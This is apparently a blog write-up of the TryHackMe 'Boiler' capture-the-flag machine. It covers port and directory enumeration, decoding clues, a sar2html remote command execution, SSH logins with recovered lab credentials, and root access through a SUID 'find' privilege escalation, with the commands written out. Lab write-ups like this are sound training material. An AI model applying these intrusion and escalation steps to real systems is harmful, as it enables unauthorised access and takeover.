Boiler CTF — TryHackMe — Writeup

5 min readNov 18, 2020


Hello. I’m Rahmos. Here is my Boiler CTF — TryHackMe — Writeup. Check it out!

First, deploy the machine and nmap for opened ports:

nmap -sV -p- -v -T4 <ip>


There are 4 ports opened: 21(FTP), 80(Apache), 10000(Webmin), 55007(SSH).


Unfortunately, webmin is in version 1.9.30, the newest version up to now, so I cannot exploit this.

First, login to FTP using anonymous and move around to get file:


There is a .txt file.

Read content of this file:

get .info.txt -

**Remember to specify the “-” symbol at the end, so that you can read it directly without transfer the file to your machine.


It’s encoded with ROT13. Let’s decode it:

ROT13 decode

Well, still find nothing valuable 😣 So I guess it’s everything we have at FTP.

As port 80(http) is opened, let’s access its website.


It’ a default Apache website. I’ve checked the page source (Ctrl+U), but nothing valuable. So let’s move to finding hidden dirs using gobuster

gobuster dir -u <ip>:80 -w /path-to-wordlist


robots.txt is existed so just read it:


You’ll see a string of decimal. Decode it from decimal and then Base64, I will use

Put the decoded string to hashid:


Decrypt it from md5. I’ll use this link:

I’ve got a string: kidding. Up to now I haven’t known what is it used for, so just leave it there.

Next, access /joomla


So now I know that the website is using Joomla CMS

Joomla! CMS

Again, scan for hidden dirs, but this time start with /joomla

gobuster dir -u http://<ip>:80/joomla -w /path-to-wordlist

gobuster /joomla

Let’s access /_files


Decode it:


Well, nothing valuable again…

Next, /~www



Next, /_archive:


Still nothing.

Next, /_database




“Time command spring”. No meaning!

Next, /_test


There’s something about sar2html. Take a look on Google about this and I’ve found:


Not only the definition, but I’ve also found the remote code exploit:

RCE exploit

So, let’s try some basic command first:


ls -al

Oh it works!! There is a log.txt file. Let’s read content of this file by changing the command to cat log.txt

cat log.txt

Now I’ve got the credential for SSH:

basterd : superduperp@$$

So what next? Let’s login to SSH using the credential above!

ssh -p 55007 basterd@<ip>

** -p flag will set the SSH port to 55007. Without it, SSH will use the default port: 22


Now I’m into the machine!

Let’s spawn a bash shell for stability using python:

python -c ‘import pty; pty.spawn(“/bin/bash”)’

bash shell

List file inside:

ls -al

So, the other users pass is stored in the file backup. Let’s read its content:

**Note: You can read it directly using cat, or transfer it to your machine using scp and then read it.
In case you choose scp, here is the command:

scp your-user-name@<your-VPN-ip>:/home/your-user-name

Now I know another credential:

stoner : superduperp@$$no1knows

Let’s SSH as stoner:

ssh -p 55007 stoner@<ip>

stoner ssh

Now I’m stoner. Move around and read file:


The content of .secret will be your user.txt flag!

Next, I’ll find a way to own root and get the final flag.

First, I use find to search for file with special SUID bit set:

find / -perm -u=s 2>/dev/null

Well so find itself has the SUID bit set. So that, I’ll also use find to priv escalation!

find . -exec /bin/bash -p \; -quit

find can also execute another command, so in this situation, I use find to execute /bin/bash to spawn a bash shell, the -p flag will make bash execute using find’s SUID. Because find has SUID of root, so bash will spawn a shell as root!

Get the final flag: root.txt


The end.




